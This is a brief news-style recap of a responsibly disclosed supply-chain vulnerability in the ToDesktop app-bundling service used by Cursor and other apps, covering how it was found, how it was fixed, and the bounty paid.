In an intriguing cybersecurity tale, a tech enthusiast discovered a severe vulnerability in TodeDesktop’s service. Initially investigating AI text editor Cursor’s installer connection to unknown domain ‘todesktop,’ they uncovered its true role as an Electron app bundler and SDK provider for various apps.
Upon creating an account on TodeDesktop, the researcher stumbled upon Firebase integration within their platform. Exploiting this finding further, they discovered insecure collections containing sensitive data from applications like ClickUp, Linear, Notion Calendar (not target companies), and more—potentially impacting millions of users across tech environments worldwide.
The core issue lay in TodeDesktop’s deployment pipeline where a PostInstall script allowed arbitrary code execution after reverse engineering through sourcemaps extracted from the @todesktop/cli package. This access led them to critical secrets stored unencrypted on the container, including Apple IDs and Firebase admin keys with full privileges.
With these credentials in hand, they demonstrated their ability to push malicious updates across affected apps instantly upon restarting them—a devastating scenario if exploited maliciously. Fortunately, swift action from both parties ensued after reporting the vulnerability responsibly; TodeDesktop promptly fixed it by separating signing processes into a privileged sidecar container outside user code areas.
The incident underscores how even small companies can face significant security challenges but emphasizes their response’s importance—in this case, deemed “awesome” by the researcher who received compensation for his efforts while maintaining confidentiality about exact amounts involved. Cursor later rewarded him an additional $50k USD acknowledging his contributions to their security measures after initially fixing the issue with TodeDesktop itself.
In conclusion, although vulnerabilities arise frequently in our digital landscape, responsible disclosure and swift action from both parties can mitigate potential damage while fostering constructive collaboration between hackers and companies alike.
Complete Article after the Jump: Here!